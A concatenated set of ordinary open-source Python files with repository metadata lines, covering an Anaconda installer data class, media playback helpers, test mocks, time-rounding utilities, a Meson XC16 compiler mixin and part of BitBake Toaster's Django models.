import partedUtils
import iscsi
import zfcp
import urllib
import iutil
import users
import rhpl
from flags import *
from constants import *
from rhpl.simpleconfig import SimpleConfigFile
import rhpl.keyboard as keyboard
import logging
log = logging.getLogger("anaconda")
# Collector class for all data related to an install/upgrade.
class InstallData:
    """Central store for all configuration data needed for an
    install/upgrade, plus the logic to write it out to the installed
    system and to a generated kickstart file."""

    def reset(self):
        """Re-initialize all per-install state back to defaults."""
        # Reset everything except:
        #
        # - The mouse
        # - The install language
        # - The keyboard

        self.instClass = None
        self.network = network.Network()
        self.iscsi = iscsi.iscsi()
        self.zfcp = zfcp.ZFCP()
        self.firewall = firewall.Firewall()
        self.security = security.Security()
        self.timezone = timezone.Timezone()
        self.users = None
        self.rootPassword = { "isCrypted": False, "password": "" }
        self.auth = "--enableshadow --enablemd5"
        self.desktop = desktop.Desktop()
        self.upgrade = None
        # XXX move fsset and/or diskset into Partitions object?
        self.fsset.reset()
        self.diskset = partedUtils.DiskSet(self.anaconda)
        self.partitions = partitions.Partitions()
        self.bootloader = bootloader.getBootloader()
        self.dependencies = []
        self.dbpath = None
        self.upgradeRoot = None
        self.rootParts = None
        self.upgradeSwapInfo = None
        self.upgradeDeps = ""
        self.upgradeRemove = []
        self.upgradeInfoFound = None
        # s390 has no local console, so firstboot cannot run there.
        if rhpl.getArch() == "s390":
            self.firstboot = FIRSTBOOT_SKIP
        else:
            self.firstboot = FIRSTBOOT_DEFAULT

        # XXX I expect this to die in the future when we have a single data
        # class and translate ksdata into that instead.
        self.ksdata = None

    def setInstallProgressClass(self, c):
        self.instProgress = c

    def setDisplayMode(self, display_mode):
        self.displayMode = display_mode

    # expects a Keyboard object
    def setKeyboard(self, keyboard):
        self.keyboard = keyboard

    # expects a Mouse object
    def setMouse(self, mouse):
        self.mouse = mouse

    # expects a VideoCardInfo object
    def setVideoCard(self, video):
        self.videocard = video

    # expects a Monitor object
    def setMonitor(self, monitor):
        self.monitor = monitor

    # expects an XSetup object
    def setXSetup(self, xsetup):
        self.xsetup = xsetup

    # expects 0/1
    def setHeadless(self, isHeadless):
        self.isHeadless = isHeadless

    def setKsdata(self, ksdata):
        self.ksdata = ksdata

    # if upgrade is None, it really means False. we use None to help the
    # installer ui figure out if it's the first time the user has entered
    # the examine_gui screen. --dcantrell
    def getUpgrade (self):
        if self.upgrade == None:
            return False
        else:
            return self.upgrade

    def setUpgrade (self, bool):
        self.upgrade = bool

    def getSalt(self):
        """Map the authconfig option string to a crypt salt name, or None
        when no recognized algorithm is selected."""
        if self.auth.find("--enablemd5") != -1 or \
           self.auth.find("--passalgo=md5") != -1:
            return 'md5'
        elif self.auth.find("--passalgo=sha256") != -1:
            return 'sha256'
        elif self.auth.find("--passalgo=sha512") != -1:
            return 'sha512'
        else:
            return None

    def write(self):
        """Write the collected configuration into the installed system
        rooted at self.anaconda.rootPath (language, keyboard, timezone,
        auth, firewall, users, services, install key)."""
        self.instLanguage.write (self.anaconda.rootPath)

        if not self.isHeadless:
            self.keyboard.write (self.anaconda.rootPath)

        self.timezone.write (self.anaconda.rootPath)

        args = ["--update", "--nostart"] + self.auth.split()

        try:
            if not flags.test:
                iutil.execWithRedirect("/usr/sbin/authconfig", args,
                                       stdout = None, stderr = None,
                                       root = self.anaconda.rootPath)
            else:
                log.error("Would have run: %s", args)
        except RuntimeError, msg:
            log.error("Error running %s: %s", args, msg)

        self.firewall.write (self.anaconda.rootPath)
        self.security.write (self.anaconda.rootPath)

        self.users = users.Users()

        # make sure crypt_style in libuser.conf matches the salt we're using
        users.createLuserConf(self.anaconda.rootPath, saltname=self.getSalt())

        # User should already exist, just without a password.
        self.users.setRootPassword(self.rootPassword["password"],
                                   self.rootPassword["isCrypted"],
                                   salt=self.getSalt())

        # Make sure multipathd is set to run for mpath installs (#243421)
        if flags.mpath:
            svc = 'multipathd'
            if self.anaconda.isKickstart:
                # Append the service only if it is not already enabled.
                try:
                    hasSvc = self.ksdata.services["enabled"].index(svc)
                except:
                    self.ksdata.services["enabled"].append(svc)
            else:
                iutil.execWithRedirect("/sbin/chkconfig",
                                       [svc, "on"],
                                       stdout="/dev/tty5", stderr="/dev/tty5",
                                       root=self.anaconda.rootPath)

        if self.anaconda.isKickstart:
            for svc in self.ksdata.services["disabled"]:
                iutil.execWithRedirect("/sbin/chkconfig",
                                       [svc, "off"],
                                       stdout="/dev/tty5", stderr="/dev/tty5",
                                       root=self.anaconda.rootPath)

            for svc in self.ksdata.services["enabled"]:
                iutil.execWithRedirect("/sbin/chkconfig",
                                       [svc, "on"],
                                       stdout="/dev/tty5", stderr="/dev/tty5",
                                       root=self.anaconda.rootPath)

            for ud in self.ksdata.userList:
                if self.users.createUser(ud.name, ud.password, ud.isCrypted,
                                         ud.groups, ud.homedir, ud.shell,
                                         ud.uid, root=self.anaconda.rootPath,
                                         salt=self.getSalt()) == None:
                    log.error("User %s already exists, not creating." % ud.name)

        if self.anaconda.id.instClass.installkey and os.path.exists(self.anaconda.rootPath + "/etc/sysconfig/rhn"):
            f = open(self.anaconda.rootPath + "/etc/sysconfig/rhn/install-num", "w+")
            f.write("%s\n" %(self.anaconda.id.instClass.installkey,))
            f.close()
            # Install number may be sensitive; restrict to root.
            os.chmod(self.anaconda.rootPath + "/etc/sysconfig/rhn/install-num",
                     0600)

    def writeKS(self, filename):
        """Generate a kickstart file at `filename` reproducing this
        install's configuration."""
        f = open(filename, "w")

        f.write("# Kickstart file automatically generated by anaconda.\n\n")
        if self.upgrade:
            f.write("upgrade\n");
        else:
            f.write("install\n");

        # figure out the install method and write out a line
        if self.methodstr.startswith('ftp://') or self.methodstr.startswith('http://'):
            f.write("url --url %s\n" % urllib.unquote(self.methodstr))
        elif self.methodstr.startswith('cdrom://'):
            f.write("cdrom\n")
        elif self.methodstr.startswith('hd://'):
            # hd://partition:/dir -> harddrive --partition --dir
            pidx = string.find(self.methodstr, '//') + 2
            didx = string.find(self.methodstr[pidx:], '/')
            partition = string.split(self.methodstr[pidx:pidx+didx], ':')[0]
            dir = self.methodstr[pidx+didx+1:]
            f.write("harddrive --partition=%s --dir=%s\n" % (partition, dir))
        elif self.methodstr.startswith('nfs:/') or self.methodstr.startswith('nfsiso:'):
            (method, tmpmntpt) = string.split(self.methodstr, ':')
            # clean up extra '/' at front
            if tmpmntpt[1] == '/':
                rawmntpt = tmpmntpt[1:]
            else:
                rawmntpt = tmpmntpt

            mntpt = os.path.normpath(rawmntpt)

            # find mntpt in /proc/mounts so we can get NFS server info
            fproc = open("/proc/mounts", "r")
            lines = fproc.readlines()
            fproc.close()

            for l in lines:
                minfo = string.split(l)
                if len(minfo) > 1 and minfo[1] == mntpt and minfo[0].find(":") != -1:
                    (srv, dir) = minfo[0].split(':')
                    f.write("nfs --server=%s --dir=%s\n" % (srv, dir))
                    break

        if self.instClass.skipkey:
            f.write("key --skip\n")
        elif self.instClass.installkey:
            f.write("key %s\n" %(self.instClass.installkey,))

        self.instLanguage.writeKS(f)
        if not self.isHeadless:
            self.keyboard.writeKS(f)
            self.xsetup.writeKS(f, self.desktop, self.ksdata)
        self.network.writeKS(f)
        self.zfcp.writeKS(f)
        self.iscsi.writeKS(f)

        # Always emit the crypted form; plaintext passwords are hashed
        # first so they never appear in the kickstart file.
        if self.rootPassword["isCrypted"]:
            f.write("rootpw --iscrypted %s\n" % self.rootPassword["password"])
        else:
            f.write("rootpw --iscrypted %s\n" % users.cryptPassword(self.rootPassword["password"], salt=self.getSalt()))

        self.firewall.writeKS(f)
        if self.auth.strip() != "":
            f.write("authconfig %s\n" % self.auth)
        self.security.writeKS(f)
        self.timezone.writeKS(f)
        self.bootloader.writeKS(f)
        self.partitions.writeKS(f)

        if self.backend is not None:
            self.backend.writeKS(f)
            self.backend.writePackagesKS(f, self.anaconda)

        # make it so only root can read, could have password
        os.chmod(filename, 0600)

    def __init__(self, anaconda, extraModules, floppyDevice, methodstr, displayMode, backend = None):
        """Set up the immutable per-run state, then delegate the rest of
        the initialization to reset()."""
        self.displayMode = displayMode

        self.instLanguage = language.Language(self.displayMode)
        self.keyboard = keyboard.Keyboard()
        self.backend = backend
        self.anaconda = anaconda

        self.mouse = None
        self.monitor = None
        self.videocard = None
        self.xsetup = None
        self.isHeadless = 0
        self.extraModules = extraModules
        self.floppyDevice = floppyDevice
        self.fsset = fsset.FileSystemSet(anaconda)
        self.excludeDocs = 0

        if flags.cmdline.has_key("excludedocs"):
            self.excludeDocs = 1

        self.methodstr = methodstr
        self.reset()
| sergey-senozhatsky/anaconda-11-vlan-support | instdata.py | Python | gpl-2.0 | 10,561 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from gstmanager.sbins.source import AudioSource
class AudioTestSource(AudioSource):
    """Audio source backed by GStreamer's audiotestsrc element."""

    def __init__(self):
        self.description = "Audio test Source class, generates 440Hz tone"
        self.type = "audio"
        AudioSource.__init__(self, "audiotestsrc")
| lucasa/landell_gst-gengui | sltv/gstmanager/sbins/sources/audiotest.py | Python | gpl-2.0 | 330 |
''' Mock implementations of the Data and DataFactory classes. '''
from smcity.models.data import Data, DataFactory
class MockData:
    """Mock stand-in for the Data model, backed by a plain dict."""

    def __init__(self, data):
        # The dict is kept as-is; each accessor reads one key from it.
        self.data = data

    def _field(self, key):
        """Look up a single attribute in the backing dict."""
        return self.data[key]

    def get_content(self):
        return self._field('content')

    def get_datum_id(self):
        return self._field('id')

    def get_location(self):
        return self._field('location')

    def get_set_id(self):
        return self._field('set_id')

    def get_timestamp(self):
        return self._field('timestamp')

    def get_type(self):
        return self._field('type')
class MockDataFactory:
    """Mock stand-in for DataFactory that records the arguments it receives
    and serves canned data from ``self.data``."""

    def create_data(self, content, id, location, set_id, timestamp, type):
        ''' {@inheritDocs} '''
        # Record every argument for later inspection by the test.
        self.created_data = dict(
            content=content,
            id=id,
            location=location,
            set_id=set_id,
            timestamp=timestamp,
            type=type,
        )

    def copy_data(self, set_id, data):
        ''' {@inheritDocs} '''
        self.copied_data_set_id = set_id
        self.copied_data = data

    def filter_global_data(self, min_timestamp=None, max_timestamp=None,
                           min_lat=None, max_lat=None,
                           min_lon=None, max_lon=None,
                           segment_id=0, num_segments=1,
                           type=None):
        ''' {@inheritDocs} '''
        # Filters are ignored; the pre-seeded data set is returned as-is.
        return self.data

    def get_data_set(self, set_id):
        ''' {@inheritDocs} '''
        return self.data
| ChaseSnapshot/smcity | smcity/models/test/mock_data.py | Python | unlicense | 1,636 |
# Copyright 2021 Camptocamp SA
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
import datetime
def roundTimeDT(dt=None, dateDelta=None):
    """Round *dt* to the nearest multiple of *dateDelta*.

    :param dt: datetime.datetime to round; defaults to ``datetime.datetime.now()``.
    :param dateDelta: rounding granularity as a timedelta; defaults to one minute.

    Author: Thierry Husson 2012 - Use it as you want but don't blame me.
           Stijn Nevens 2014 - Changed to use only datetime objects as variables
    """
    if dt is None:
        dt = datetime.datetime.now()
    # Granularity in (possibly fractional) seconds; a zero/None delta
    # falls back to one minute.
    step = (dateDelta or datetime.timedelta(minutes=1)).total_seconds()
    # Whole seconds elapsed within the current day fraction.
    elapsed = (dt - dt.min).seconds
    # Snap to the nearest multiple of the step (floor division rounds the
    # half-step-shifted value down).
    snapped = ((elapsed + step / 2) // step) * step
    # Shift by the difference and strip sub-second noise.
    return dt + datetime.timedelta(seconds=snapped - elapsed,
                                   microseconds=-dt.microsecond)
def roundTime(dt=None, hours=0, minutes=0, seconds=0):
    """Convenience wrapper around :func:`roundTimeDT` taking the rounding
    granularity as hours/minutes/seconds instead of a timedelta."""
    delta = datetime.timedelta(hours=hours, minutes=minutes, seconds=seconds)
    return roundTimeDT(dt=dt, dateDelta=delta)
| OCA/sale-workflow | sale_product_seasonality/utils.py | Python | agpl-3.0 | 1,102 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2012-2013 Hector Martin "marcan" <hector@marcansoft.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 or version 3.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
import OpenGL.GL as gl
import ffms
class BackgroundVideo(object):
    """Decodes a song's background video via FFMS2 and draws the current
    frame as a full-width OpenGL textured quad, applying per-song offset
    and fade-in/fade-out brightness.

    Fix vs. original: removed the dead local ``last_frame = self.timecodes``
    in draw() (assigned, never used).
    """

    def __init__(self, song):
        # Optional per-song tuning read from the song file.
        self.offset = 0
        self.fade_in = 1
        self.fade_out = 1
        if "video_offset" in song.song:
            self.offset = float(song.song["video_offset"])
        if "fade_in" in song.song:
            self.fade_in = float(song.song["fade_in"])
        if "fade_out" in song.song:
            self.fade_out = float(song.song["fade_out"])
        self.vsource = ffms.VideoSource(song.videofile)
        self.vsource.set_output_format([ffms.get_pix_fmt("bgr32")])
        self.frameno = 0
        self.frame = None
        # Frame timestamps converted from milliseconds to seconds.
        self.timecodes = [i/1000.0 for i in self.vsource.track.timecodes]
        self.texid = gl.glGenTextures(1)
        # Decode the first frame to learn the scaled output dimensions.
        frame = self.vsource.get_frame(0)
        self.width = frame.ScaledWidth
        self.height = frame.ScaledHeight
        # NOTE(review): here self.frame is a copied plane, while advance()
        # stores the whole frame object and draw() reads .planes[0] from it
        # -- the two representations look inconsistent; confirm upstream.
        self.frame = frame.planes[0].copy()
        # Sample aspect ratio: stream value, 0 meaning "unknown" -> treat as
        # square pixels; overridable per song via "video_sar".
        self.sar = self.vsource.properties.SARNum / self.vsource.properties.SARDen
        if self.sar == 0:
            self.sar = 1
        if "video_sar" in song.song:
            self.sar = float(song.song["video_sar"])
        self.aspect = self.sar * self.width / self.height

    def advance(self, time):
        """Advance the decoder so self.frame holds the frame for `time` (s)."""
        if self.frameno >= len(self.timecodes)-1:
            return
        cur_frame = self.frameno
        # Walk forward until the next frame's timestamp is past `time`.
        while time > self.timecodes[self.frameno+1]:
            self.frameno += 1
            if self.frameno >= len(self.timecodes)-1:
                break
        if self.frameno != cur_frame:
            self.frame = self.vsource.get_frame(self.frameno)

    def draw(self, time, display, song_length):
        """Upload and draw the frame for `time`, dimmed near the song's
        start (fade_in) and end (fade_out)."""
        brightness = 1
        if time > (song_length - self.fade_out) and self.fade_out:
            brightness *= max(0, min(1, (song_length - time) / self.fade_out))
        # A negative offset shifts the video before the fade-in check, a
        # positive one after it, so the fade always tracks song time.
        if self.offset < 0:
            time += self.offset
        if time < self.fade_in and self.fade_in:
            brightness *= max(0, min(1, time/self.fade_in))
        if self.offset > 0:
            time += self.offset
        self.advance(time)
        data = self.frame.planes[0]
        gl.glDisable(gl.GL_BLEND)
        gl.glBindTexture(gl.GL_TEXTURE_2D, self.texid)
        gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MIN_FILTER, gl.GL_LINEAR);
        gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MAG_FILTER, gl.GL_LINEAR);
        gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_WRAP_S, gl.GL_CLAMP);
        gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_WRAP_T, gl.GL_CLAMP);
        gl.glTexImage2D(gl.GL_TEXTURE_2D, 0, 3,
                        self.width, self.height, 0,
                        gl.GL_RGBA, gl.GL_UNSIGNED_BYTE, data)
        gl.glActiveTexture(gl.GL_TEXTURE0)
        gl.glBindTexture(gl.GL_TEXTURE_2D, self.texid)
        gl.glEnable(gl.GL_TEXTURE_2D)
        gl.glBegin(gl.GL_TRIANGLE_STRIP)
        # Letterbox the quad: center a strip of height h in the display's
        # (normalized) height.
        h = self.height / self.width / self.sar
        dh = display.height / display.width
        offset = (dh-h) / 2
        gl.glColor4f(brightness,brightness,brightness,1)
        gl.glTexCoord2f(0,1)
        gl.glVertex2f(0,offset)
        gl.glTexCoord2f(1,1)
        gl.glVertex2f(1,offset)
        gl.glTexCoord2f(0,0)
        gl.glVertex2f(0,offset+h)
        gl.glTexCoord2f(1,0)
        gl.glVertex2f(1,offset+h)
        gl.glEnd()
        gl.glDisable(gl.GL_TEXTURE_2D)

    def __del__(self):
        # Free the GL texture when the video object goes away.
        gl.glDeleteTextures(self.texid)
| yacoob/blitzloop | blitzloop/ffmsvideo.py | Python | gpl-2.0 | 4,227 |
from .wrapper import external_call
| crevetor/vcrwrapper | vcrwrapper/__init__.py | Python | gpl-2.0 | 35 |
# Copyright 2012-2019 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Representations specific to the Microchip XC16 C compiler family."""
import os
import typing as T
from ...mesonlib import EnvironmentException
if T.TYPE_CHECKING:
from ...environment import Environment
from ...compilers.compilers import Compiler
else:
# This is a bit clever, for mypy we pretend that these mixins descend from
# Compiler, so we get all of the methods and attributes defined for us, but
# for runtime we make them descend from object (which all classes normally
# do). This gives up DRYer type checking, with no runtime impact
Compiler = object
# Per-buildtype extra arguments; xc16 needs none, so every entry is empty.
xc16_buildtype_args = {
    'plain': [],
    'debug': [],
    'debugoptimized': [],
    'release': [],
    'minsize': [],
    'custom': [],
}  # type: T.Dict[str, T.List[str]]

# Meson optimization level -> xc16 -O flag mapping.
xc16_optimization_args = {
    '0': ['-O0'],
    'g': ['-O0'],
    '1': ['-O1'],
    '2': ['-O2'],
    '3': ['-O3'],
    's': ['-Os']
}  # type: T.Dict[str, T.List[str]]

# Debug on/off adds no flags for xc16.
xc16_debug_args = {
    False: [],
    True: []
}  # type: T.Dict[bool, T.List[str]]
class Xc16Compiler(Compiler):

    """Mixin implementing the Microchip XC16-specific compiler behaviour."""

    id = 'xc16'

    def __init__(self) -> None:
        if not self.is_cross:
            raise EnvironmentException('xc16 supports only cross-compilation.')
        # Assembly
        self.can_compile_suffixes.add('s')
        default_warn_args = []  # type: T.List[str]
        self.warn_args = {'0': [],
                          '1': default_warn_args,
                          '2': default_warn_args + [],
                          '3': default_warn_args + []}  # type: T.Dict[str, T.List[str]]

    def get_always_args(self) -> T.List[str]:
        return []

    def get_pic_args(self) -> T.List[str]:
        # PIC support is not enabled by default for xc16,
        # if users want to use it, they need to add the required arguments explicitly
        return []

    def get_buildtype_args(self, buildtype: str) -> T.List[str]:
        return xc16_buildtype_args[buildtype]

    def get_pch_suffix(self) -> str:
        return 'pch'

    def get_pch_use_args(self, pch_dir: str, header: str) -> T.List[str]:
        return []

    def thread_flags(self, env: 'Environment') -> T.List[str]:
        return []

    def get_coverage_args(self) -> T.List[str]:
        return []

    def get_no_stdinc_args(self) -> T.List[str]:
        return ['-nostdinc']

    def get_no_stdlib_link_args(self) -> T.List[str]:
        return ['--nostdlib']

    def get_optimization_args(self, optimization_level: str) -> T.List[str]:
        return xc16_optimization_args[optimization_level]

    def get_debug_args(self, is_debug: bool) -> T.List[str]:
        return xc16_debug_args[is_debug]

    @classmethod
    def unix_args_to_native(cls, args: T.List[str]) -> T.List[str]:
        """Translate GCC-style arguments for xc16, dropping rpath,
        --print-search-dirs and -L arguments that it does not understand."""
        result = []
        for i in args:
            if i.startswith('-D'):
                i = '-D' + i[2:]
            if i.startswith('-I'):
                i = '-I' + i[2:]
            if i.startswith('-Wl,-rpath='):
                continue
            elif i == '--print-search-dirs':
                continue
            elif i.startswith('-L'):
                continue
            result.append(i)
        return result

    def compute_parameters_with_absolute_paths(self, parameter_list: T.List[str], build_dir: str) -> T.List[str]:
        """Rewrite relative ``-I`` include paths to be absolute w.r.t. build_dir.

        Bug fix: the original tested ``i[:9] == '-I'``, which can only be
        true when the argument is exactly '-I' (at most two characters), so
        include paths were never rewritten -- and it sliced at offset 9,
        mangling the path.  The '-I' prefix is two characters long, so we
        compare and split at offset 2.
        """
        for idx, i in enumerate(parameter_list):
            if i[:2] == '-I':
                parameter_list[idx] = i[:2] + os.path.normpath(os.path.join(build_dir, i[2:]))
        return parameter_list
| mesonbuild/meson | mesonbuild/compilers/mixins/xc16.py | Python | apache-2.0 | 4,081 |
#
# BitBake Toaster Implementation
#
# Copyright (C) 2013 Intel Corporation
#
# SPDX-License-Identifier: GPL-2.0-only
#
from __future__ import unicode_literals
from django.db import models, IntegrityError, DataError
from django.db.models import F, Q, Sum, Count
from django.utils import timezone
from django.utils.encoding import force_bytes
from django.core.urlresolvers import reverse
from django.core import validators
from django.conf import settings
import django.db.models.signals
import sys
import os
import re
import itertools
from signal import SIGUSR1
import logging
logger = logging.getLogger("toaster")
# When running on SQLite, concurrent writers routinely hit transient
# "database is locked" OperationalErrors.  Monkey-patch the write paths of
# the Django ORM to retry (save) or wrap in an atomic block (insert,
# get_or_create helper) so Toaster does not crash on that error.
if 'sqlite' in settings.DATABASES['default']['ENGINE']:
    from django.db import transaction, OperationalError
    from time import sleep

    _base_save = models.Model.save
    def save(self, *args, **kwargs):
        # Retry forever, sleeping 0.5s between attempts, while the error
        # is the transient lock; re-raise any other OperationalError.
        while True:
            try:
                with transaction.atomic():
                    return _base_save(self, *args, **kwargs)
            except OperationalError as err:
                if 'database is locked' in str(err):
                    logger.warning("%s, model: %s, args: %s, kwargs: %s",
                                   err, self.__class__, args, kwargs)
                    sleep(0.5)
                    continue
                raise

    models.Model.save = save

    # HACK: Monkey patch Django to fix 'database is locked' issue
    from django.db.models.query import QuerySet
    _base_insert = QuerySet._insert
    def _insert(self, *args, **kwargs):
        # Run every low-level insert inside an atomic block (no savepoint).
        with transaction.atomic(using=self.db, savepoint=False):
            return _base_insert(self, *args, **kwargs)
    QuerySet._insert = _insert

    from django.utils import six
    def _create_object_from_params(self, lookup, params):
        """
        Tries to create an object using passed params.
        Used by get_or_create and update_or_create
        """
        try:
            obj = self.create(**params)
            return obj, True
        except (IntegrityError, DataError):
            # Creation lost a race (or data was invalid): fall back to
            # fetching the existing row; re-raise the original error if
            # that also fails.
            exc_info = sys.exc_info()
            try:
                return self.get(**lookup), False
            except self.model.DoesNotExist:
                pass
            six.reraise(*exc_info)
    QuerySet._create_object_from_params = _create_object_from_params
    # end of HACK
class GitURLValidator(validators.URLValidator):
    """URLValidator variant that also accepts git-style remote URLs
    (ssh:// and git:// schemes) in addition to http(s)/ftp(s).

    Fix vs. original: dropped the redundant ``import re`` in the class
    body -- ``re`` is already imported at module level.
    """
    regex = re.compile(
        r'^(?:ssh|git|http|ftp)s?://'  # http:// or https://
        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'  # domain...
        r'localhost|'  # localhost...
        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|'  # ...or ipv4
        r'\[?[A-F0-9]*:[A-F0-9:]+\]?)'  # ...or ipv6
        r'(?::\d+)?'  # optional port
        r'(?:/?|[/?]\S+)$', re.IGNORECASE)
def GitURLField(**kwargs):
    """Build a URLField whose URLValidator entries are replaced with
    GitURLValidator so git/ssh remote URLs pass validation."""
    field = models.URLField(**kwargs)
    for idx, validator in enumerate(field.validators):
        if isinstance(validator, validators.URLValidator):
            field.validators[idx] = GitURLValidator()
    return field
class ToasterSetting(models.Model):
    """Global key/value configuration entry for Toaster."""
    name = models.CharField(max_length=63)
    helptext = models.TextField()
    value = models.CharField(max_length=255)

    def __unicode__(self):
        return "Setting %s = %s" % (self.name, self.value)
class ProjectManager(models.Manager):
    """Manager adding Project creation helpers (release defaults, default
    project for command-line builds)."""

    def create_project(self, name, release, existing_project=None):
        """Create (or re-target) a Project for the given release.

        Copies DEFCONF_* ToasterSettings into project variables and, when a
        release is given, attaches its default layers.
        """
        if existing_project and (release is not None):
            # Re-point an existing project at the new release.
            prj = existing_project
            prj.bitbake_version = release.bitbake_version
            prj.release = release
            # Delete the previous ProjectLayer mappings
            for pl in ProjectLayer.objects.filter(project=prj):
                pl.delete()
        elif release is not None:
            prj = self.model(name=name,
                             bitbake_version=release.bitbake_version,
                             release=release)
        else:
            prj = self.model(name=name,
                             bitbake_version=None,
                             release=None)
        prj.save()

        # Seed project variables from DEFCONF_<NAME> settings (the 8-char
        # "DEFCONF_" prefix is stripped to get the variable name; note this
        # rebinds the `name` parameter).
        for defaultconf in ToasterSetting.objects.filter(
                name__startswith="DEFCONF_"):
            name = defaultconf.name[8:]
            pv,create = ProjectVariable.objects.get_or_create(project=prj,name=name)
            pv.value = defaultconf.value
            pv.save()

        if release is None:
            return prj
        # Attach the release's default layers where a matching layer
        # version exists.
        for rdl in release.releasedefaultlayer_set.all():
            lv = Layer_Version.objects.filter(
                layer__name=rdl.layer_name,
                release=release).first()
            if lv:
                ProjectLayer.objects.create(project=prj,
                                            layercommit=lv,
                                            optional=False)
            else:
                logger.warning("Default project layer %s not found" %
                               rdl.layer_name)
        return prj

    # return single object with is_default = True
    def get_or_create_default_project(self):
        """Return the single default project, creating it if missing;
        raise if the data is inconsistent (more than one default)."""
        projects = super(ProjectManager, self).filter(is_default=True)
        if len(projects) > 1:
            raise Exception('Inconsistent project data: multiple ' +
                            'default projects (i.e. with is_default=True)')
        elif len(projects) < 1:
            options = {
                'name': 'Command line builds',
                'short_description':
                'Project for builds started outside Toaster',
                'is_default': True
            }
            project = Project.objects.create(**options)
            project.save()
            return project
        else:
            return projects[0]
class Project(models.Model):
    """A Toaster build project: a release/bitbake pairing plus layers,
    variables and targets, from which builds are scheduled."""
    search_allowed_fields = ['name', 'short_description', 'release__name',
                             'release__branch_name']
    name = models.CharField(max_length=100)
    short_description = models.CharField(max_length=50, blank=True)
    bitbake_version = models.ForeignKey('BitbakeVersion', null=True)
    release = models.ForeignKey("Release", null=True)
    created = models.DateTimeField(auto_now_add=True)
    updated = models.DateTimeField(auto_now=True)
    # This is a horrible hack; since Toaster has no "User" model available when
    # running in interactive mode, we can't reference the field here directly
    # Instead, we keep a possible null reference to the User id,
    # as not to force
    # hard links to possibly missing models
    user_id = models.IntegerField(null=True)
    objects = ProjectManager()

    # build directory override (e.g. imported)
    builddir = models.TextField()
    # merge the Toaster configure attributes directly into the standard conf files
    merged_attr = models.BooleanField(default=False)

    # set to True for the project which is the default container
    # for builds initiated by the command line etc.
    is_default= models.BooleanField(default=False)

    def __unicode__(self):
        return "%s (Release %s, BBV %s)" % (self.name, self.release, self.bitbake_version)

    def get_current_machine_name(self):
        """Return the project's MACHINE variable value, or None if unset."""
        try:
            return self.projectvariable_set.get(name="MACHINE").value
        except (ProjectVariable.DoesNotExist,IndexError):
            return None;

    def get_number_of_builds(self):
        """Return the number of builds which have ended"""
        return self.build_set.exclude(
            Q(outcome=Build.IN_PROGRESS) |
            Q(outcome=Build.CANCELLED)
        ).count()

    def get_last_build_id(self):
        """Return the id of the most recent build, or -1 if there is none."""
        try:
            return Build.objects.filter( project = self.id ).order_by('-completed_on')[0].id
        except (Build.DoesNotExist,IndexError):
            return( -1 )

    def get_last_outcome(self):
        """Return the outcome of the latest build ('' if no build,
        'not_found' if the build vanished)."""
        build_id = self.get_last_build_id()
        if (-1 == build_id):
            return( "" )
        try:
            return Build.objects.filter( id = build_id )[ 0 ].outcome
        except (Build.DoesNotExist,IndexError):
            return( "not_found" )

    def get_last_target(self):
        """Return the first target name of the latest build."""
        build_id = self.get_last_build_id()
        if (-1 == build_id):
            return( "" )
        try:
            return Target.objects.filter(build = build_id)[0].target
        except (Target.DoesNotExist,IndexError):
            return( "not_found" )

    def get_last_errors(self):
        """Return the error count of the latest build."""
        build_id = self.get_last_build_id()
        if (-1 == build_id):
            return( 0 )
        try:
            return Build.objects.filter(id = build_id)[ 0 ].errors.count()
        except (Build.DoesNotExist,IndexError):
            return( "not_found" )

    def get_last_warnings(self):
        """Return the warning count of the latest build."""
        build_id = self.get_last_build_id()
        if (-1 == build_id):
            return( 0 )
        try:
            return Build.objects.filter(id = build_id)[ 0 ].warnings.count()
        except (Build.DoesNotExist,IndexError):
            return( "not_found" )

    def get_last_build_extensions(self):
        """
        Get list of file name extensions for images produced by the most
        recent build
        """
        last_build = Build.objects.get(pk = self.get_last_build_id())
        return last_build.get_image_file_extensions()

    def get_last_imgfiles(self):
        """Return the IMAGE_FSTYPES value recorded for the latest build."""
        build_id = self.get_last_build_id()
        if (-1 == build_id):
            return( "" )
        try:
            return Variable.objects.filter(build = build_id, variable_name = "IMAGE_FSTYPES")[ 0 ].variable_value
        except (Variable.DoesNotExist,IndexError):
            return( "not_found" )

    def get_all_compatible_layer_versions(self):
        """ Returns Queryset of all Layer_Versions which are compatible with
        this project"""
        queryset = None

        # guard on release, as it can be null
        if self.release:
            queryset = Layer_Version.objects.filter(
                (Q(release=self.release) &
                 Q(build=None) &
                 Q(project=None)) |
                Q(project=self))
        else:
            queryset = Layer_Version.objects.none()

        return queryset

    def get_project_layer_versions(self, pk=False):
        """ Returns the Layer_Versions currently added to this project """
        layer_versions = self.projectlayer_set.all().values_list('layercommit',
                                                                 flat=True)

        if pk is False:
            return Layer_Version.objects.filter(pk__in=layer_versions)
        else:
            return layer_versions

    def get_default_image_recipe(self):
        """Return the DEFAULT_IMAGE project variable, or None if unset."""
        try:
            return self.projectvariable_set.get(name="DEFAULT_IMAGE").value
        except (ProjectVariable.DoesNotExist,IndexError):
            return None;

